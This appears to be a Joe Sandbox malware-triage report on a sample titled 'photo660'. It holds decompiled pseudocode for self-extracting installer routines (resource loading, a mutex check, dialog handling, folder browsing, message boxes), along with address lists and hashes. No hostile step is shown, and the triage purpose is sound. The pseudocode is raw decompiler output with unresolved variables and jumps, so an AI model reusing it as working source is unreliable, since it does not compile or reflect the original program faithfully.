                                                                                                                                                                                                        0x00bc2e43
                                                                                                                                                                                                        0x00bc2e48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2e48
                                                                                                                                                                                                        0x00bc2e30
                                                                                                                                                                                                        0x00bc2e30
                                                                                                                                                                                                        0x00bc2ef8
                                                                                                                                                                                                        0x00bc2f01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2f01
                                                                                                                                                                                                        0x00bc2d8a
                                                                                                                                                                                                        0x00bc2d8f
                                                                                                                                                                                                        0x00bc2da1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2da3
                                                                                                                                                                                                        0x00bc2dae
                                                                                                                                                                                                        0x00bc2db4
                                                                                                                                                                                                        0x00bc2dbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2dca
                                                                                                                                                                                                        0x00bc2dd3
                                                                                                                                                                                                        0x00bc2df5
                                                                                                                                                                                                        0x00bc2e02
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2dd5
                                                                                                                                                                                                        0x00bc2dde
                                                                                                                                                                                                        0x00bc2de3
                                                                                                                                                                                                        0x00bc2e04
                                                                                                                                                                                                        0x00bc2e0a
                                                                                                                                                                                                        0x00bc2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2e10
                                                                                                                                                                                                        0x00bc2dd3
                                                                                                                                                                                                        0x00bc2dbb
                                                                                                                                                                                                        0x00bc2da1
                                                                                                                                                                                                        0x00bc2d5b
                                                                                                                                                                                                        0x00bc2d5b
                                                                                                                                                                                                        0x00bc2d5d
                                                                                                                                                                                                        0x00bc2d69
                                                                                                                                                                                                        0x00bc2d6e
                                                                                                                                                                                                        0x00bc2f06
                                                                                                                                                                                                        0x00bc2f06
                                                                                                                                                                                                        0x00bc2f06
                                                                                                                                                                                                        0x00bc2d59
                                                                                                                                                                                                        0x00bc2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2CF9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(photo660,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2E0A
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$photo660
                                                                                                                                                                                                        • API String ID: 1002816675-3055790139
                                                                                                                                                                                                        • Opcode ID: ac6ecb72dde441774bc60c9082fd72ebb2cfd823310f95c484a3f593c9b33b9c
                                                                                                                                                                                                        • Instruction ID: 9a023c5ced9c7a5c253ad16342b94272f2729960eb3a3ba4fbc0829fc5c5b287
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac6ecb72dde441774bc60c9082fd72ebb2cfd823310f95c484a3f593c9b33b9c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF51C070740306ABF724AB259C5AF7B36D8EB9A704F1440BDF942E62E5DFB4C841CA25
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00BC34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xbc91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xbc8584 = _t35;
					E00BC43D0(_t35, GetDesktopWindow());
					__eflags =  *0xbc8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "photo660");
					_t17 = CreateThread(0, 0, E00BC4FE0, 0, 0, 0xbc8798);
					 *0xbc879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00BC44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xbc858c);
					_t38 =  *0xbc8584; // 0x0
					_t25 = E00BC44B9(_t38, 0x4b2, 0xbc1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xbc91d8 = 1;
						SetEvent( *0xbc858c);
						_t39 =  *0xbc879c; // 0x0
						E00BC3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xbc858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xbc879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                        0x00bc34fb
                                                                                                                                                                                                        0x00bc34fe
                                                                                                                                                                                                        0x00bc3665
                                                                                                                                                                                                        0x00bc3666
                                                                                                                                                                                                        0x00bc3666
                                                                                                                                                                                                        0x00bc3668
                                                                                                                                                                                                        0x00bc366e
                                                                                                                                                                                                        0x00bc366e
                                                                                                                                                                                                        0x00bc3671
                                                                                                                                                                                                        0x00bc3671
                                                                                                                                                                                                        0x00bc3677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3677
                                                                                                                                                                                                        0x00bc3504
                                                                                                                                                                                                        0x00bc3506
                                                                                                                                                                                                        0x00bc3507
                                                                                                                                                                                                        0x00bc350c
                                                                                                                                                                                                        0x00bc365b
                                                                                                                                                                                                        0x00bc365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3661
                                                                                                                                                                                                        0x00bc3512
                                                                                                                                                                                                        0x00bc3515
                                                                                                                                                                                                        0x00bc35be
                                                                                                                                                                                                        0x00bc35c1
                                                                                                                                                                                                        0x00bc35d1
                                                                                                                                                                                                        0x00bc35d8
                                                                                                                                                                                                        0x00bc35de
                                                                                                                                                                                                        0x00bc35f8
                                                                                                                                                                                                        0x00bc3617
                                                                                                                                                                                                        0x00bc3617
                                                                                                                                                                                                        0x00bc3623
                                                                                                                                                                                                        0x00bc3637
                                                                                                                                                                                                        0x00bc363d
                                                                                                                                                                                                        0x00bc3642
                                                                                                                                                                                                        0x00bc3644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3646
                                                                                                                                                                                                        0x00bc3652
                                                                                                                                                                                                        0x00bc3657
                                                                                                                                                                                                        0x00bc3658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3658
                                                                                                                                                                                                        0x00bc3644
                                                                                                                                                                                                        0x00bc351b
                                                                                                                                                                                                        0x00bc351d
                                                                                                                                                                                                        0x00bc354f
                                                                                                                                                                                                        0x00bc3553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc355f
                                                                                                                                                                                                        0x00bc3565
                                                                                                                                                                                                        0x00bc357c
                                                                                                                                                                                                        0x00bc3581
                                                                                                                                                                                                        0x00bc3584
                                                                                                                                                                                                        0x00bc359b
                                                                                                                                                                                                        0x00bc35a1
                                                                                                                                                                                                        0x00bc35a7
                                                                                                                                                                                                        0x00bc35ad
                                                                                                                                                                                                        0x00bc35b3
                                                                                                                                                                                                        0x00bc35b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc35b8
                                                                                                                                                                                                        0x00bc3586
                                                                                                                                                                                                        0x00bc3588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3590
                                                                                                                                                                                                        0x00bc3524
                                                                                                                                                                                                        0x00bc3535
                                                                                                                                                                                                        0x00bc3541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00BC3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00BC3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00BC355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00BC1140,00000000,00000020,00000004), ref: 00BC3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00BC35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00BC35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00BC3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00BC3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00BC3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00BC3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 2406144884-1757243477
                                                                                                                                                                                                        • Opcode ID: 7d799d19e103bd0dfb244467e8809736c965b87b7ed5e1f8dd994ed15ba4c50e
                                                                                                                                                                                                        • Instruction ID: d71852f4133f6c9bac365de0c878bdee84f051e19e36f0fa37d0dad14d6c6565
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d799d19e103bd0dfb244467e8809736c965b87b7ed5e1f8dd994ed15ba4c50e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F31AE31244304BBD7201F25AC4DF2B3AE8E79EF05F98856DF612A72A4CF758A00DB65
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00BC4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00BC44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xbc88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xbc87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xbc8598;
					_v36 = 1;
					_v32 = E00BC4200;
					_v28 = 0xbc88c0;
					 *0xbca288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xbca288(_t32, 0xbc88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xbc88c0 != 0) {
							E00BC1680(0xbc87a0, 0x104, 0xbc88c0);
						}
						 *0xbca288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xbc87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xbc88c0);
					_t61 = 0xbc88c0;
					_t4 =  &(_t61[1]); // 0xbc88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xbc88c0; // 0x1791181
					_t44 = CharPrevA(0xbc88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xbc88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                        0x00bc4234
                                                                                                                                                                                                        0x00bc423c
                                                                                                                                                                                                        0x00bc4240
                                                                                                                                                                                                        0x00bc43b2
                                                                                                                                                                                                        0x00bc43b7
                                                                                                                                                                                                        0x00bc43c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc43c5
                                                                                                                                                                                                        0x00bc424c
                                                                                                                                                                                                        0x00bc4252
                                                                                                                                                                                                        0x00bc4257
                                                                                                                                                                                                        0x00bc43a4
                                                                                                                                                                                                        0x00bc43a5
                                                                                                                                                                                                        0x00bc43ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc43ab
                                                                                                                                                                                                        0x00bc4263
                                                                                                                                                                                                        0x00bc4269
                                                                                                                                                                                                        0x00bc426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc427a
                                                                                                                                                                                                        0x00bc4280
                                                                                                                                                                                                        0x00bc4285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc428d
                                                                                                                                                                                                        0x00bc4293
                                                                                                                                                                                                        0x00bc42e6
                                                                                                                                                                                                        0x00bc42e9
                                                                                                                                                                                                        0x00bc42ef
                                                                                                                                                                                                        0x00bc42f4
                                                                                                                                                                                                        0x00bc42f7
                                                                                                                                                                                                        0x00bc4300
                                                                                                                                                                                                        0x00bc4307
                                                                                                                                                                                                        0x00bc430e
                                                                                                                                                                                                        0x00bc4315
                                                                                                                                                                                                        0x00bc431c
                                                                                                                                                                                                        0x00bc4322
                                                                                                                                                                                                        0x00bc4326
                                                                                                                                                                                                        0x00bc432d
                                                                                                                                                                                                        0x00bc432d
                                                                                                                                                                                                        0x00bc432f
                                                                                                                                                                                                        0x00bc4334
                                                                                                                                                                                                        0x00bc4343
                                                                                                                                                                                                        0x00bc4349
                                                                                                                                                                                                        0x00bc434d
                                                                                                                                                                                                        0x00bc4354
                                                                                                                                                                                                        0x00bc4354
                                                                                                                                                                                                        0x00bc435d
                                                                                                                                                                                                        0x00bc436e
                                                                                                                                                                                                        0x00bc436e
                                                                                                                                                                                                        0x00bc437d
                                                                                                                                                                                                        0x00bc4383
                                                                                                                                                                                                        0x00bc4387
                                                                                                                                                                                                        0x00bc438e
                                                                                                                                                                                                        0x00bc438e
                                                                                                                                                                                                        0x00bc4387
                                                                                                                                                                                                        0x00bc4391
                                                                                                                                                                                                        0x00bc4399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4295
                                                                                                                                                                                                        0x00bc429f
                                                                                                                                                                                                        0x00bc42a5
                                                                                                                                                                                                        0x00bc42aa
                                                                                                                                                                                                        0x00bc42aa
                                                                                                                                                                                                        0x00bc42ad
                                                                                                                                                                                                        0x00bc42ad
                                                                                                                                                                                                        0x00bc42af
                                                                                                                                                                                                        0x00bc42b0
                                                                                                                                                                                                        0x00bc42b6
                                                                                                                                                                                                        0x00bc42c2
                                                                                                                                                                                                        0x00bc42c8
                                                                                                                                                                                                        0x00bc42ce
                                                                                                                                                                                                        0x00bc42e4
                                                                                                                                                                                                        0x00bc42e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc42ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00BC4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00BC424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00BC4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00BC427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00BC88C0,?,00000001), ref: 00BC429F
                                                                                                                                                                                                        • CharPrevA.USER32(00BC88C0,01791181,?,00000001), ref: 00BC42C2
                                                                                                                                                                                                        • CharPrevA.USER32(00BC88C0,00000000,?,00000001), ref: 00BC42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00BC4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00BC43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 52e91709e27a2e23e6135429671c7143f46dafd2b0a22b8ebed26c82df115465
                                                                                                                                                                                                        • Instruction ID: b0bec7e2f4120a9dfc08fa2248a095c84a272ac515bc22618a96954475b826ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52e91709e27a2e23e6135429671c7143f46dafd2b0a22b8ebed26c82df115465
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC41E274A00244AFD711AB64DCA9FAE7BF4EB89348F0401ADE941A7291CF748E018765
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xbc8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xbc9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00BC1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00BC171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00BC171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00BC681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00BC67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "photo660", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00BC681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00BC67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "photo660", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00BC6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                        0x00bc44b9
                                                                                                                                                                                                        0x00bc44c4
                                                                                                                                                                                                        0x00bc44cb
                                                                                                                                                                                                        0x00bc44d8
                                                                                                                                                                                                        0x00bc44e4
                                                                                                                                                                                                        0x00bc44eb
                                                                                                                                                                                                        0x00bc44ee
                                                                                                                                                                                                        0x00bc44ef
                                                                                                                                                                                                        0x00bc44ef
                                                                                                                                                                                                        0x00bc44f1
                                                                                                                                                                                                        0x00bc44f7
                                                                                                                                                                                                        0x00bc44f8
                                                                                                                                                                                                        0x00bc467b
                                                                                                                                                                                                        0x00bc44fe
                                                                                                                                                                                                        0x00bc4509
                                                                                                                                                                                                        0x00bc4518
                                                                                                                                                                                                        0x00bc4525
                                                                                                                                                                                                        0x00bc4562
                                                                                                                                                                                                        0x00bc4568
                                                                                                                                                                                                        0x00bc4568
                                                                                                                                                                                                        0x00bc456b
                                                                                                                                                                                                        0x00bc456b
                                                                                                                                                                                                        0x00bc456d
                                                                                                                                                                                                        0x00bc456e
                                                                                                                                                                                                        0x00bc4572
                                                                                                                                                                                                        0x00bc4578
                                                                                                                                                                                                        0x00bc457c
                                                                                                                                                                                                        0x00bc45cb
                                                                                                                                                                                                        0x00bc4607
                                                                                                                                                                                                        0x00bc4607
                                                                                                                                                                                                        0x00bc460d
                                                                                                                                                                                                        0x00bc4613
                                                                                                                                                                                                        0x00bc4617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc461d
                                                                                                                                                                                                        0x00bc4623
                                                                                                                                                                                                        0x00bc4626
                                                                                                                                                                                                        0x00bc4628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4628
                                                                                                                                                                                                        0x00bc45cd
                                                                                                                                                                                                        0x00bc45cd
                                                                                                                                                                                                        0x00bc45cf
                                                                                                                                                                                                        0x00bc45cf
